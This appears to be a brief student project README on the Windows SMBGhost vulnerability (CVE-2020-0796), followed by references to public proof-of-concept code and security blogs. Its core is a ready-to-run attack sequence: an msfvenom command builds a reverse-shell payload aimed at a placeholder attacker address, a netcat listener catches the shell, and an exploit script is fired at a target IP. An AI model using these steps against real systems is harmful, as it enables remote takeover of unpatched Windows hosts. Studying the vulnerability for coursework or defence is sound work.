CVE-2020-0796 explanation and researching vulnerability for term porject CENG325 for beginners
Userpayload generation for reverse shell:
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python
listening port:
nc -lvnp 5555
exploit code execution:
python3 exploit.py -ip TARGET_IP
- https://github.com/chompie1337/SMBGhost_RCE_PoC
- https://github.com/ollypwn/SMBGhost
- CVE-2020-0796: “Wormable” Remote Code Execution Vulnerability in.(2020, March 13). Tenable®. https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block
- “I’ll ask your body”: SMBGhost pre-auth RCE abusing Direct Memory Access structs. (2020, April 20). Ricercasecurtiy.Blogspot.https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
- CVE-2020-0796 Memory Corruption Vulnerability in Windows 10 SMB Server| FortiGuard Labs. (2020, March 12). Fortinet Blog. https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server
- Team, K. (2020, April 2). CVE-2020–0796 Windows SMBv3 LPE Exploit POC Analysis. Medium.https://medium.com/@knownsec404team/cve-2020-0796-windows-smbv3-lpe-exploit-poc-analysis-c77569124c87
- CVE-2020-0796 –. (2020). Cyber Threat Insider Blog.https://blog.sensecy.com/tag/cve-2020-0796/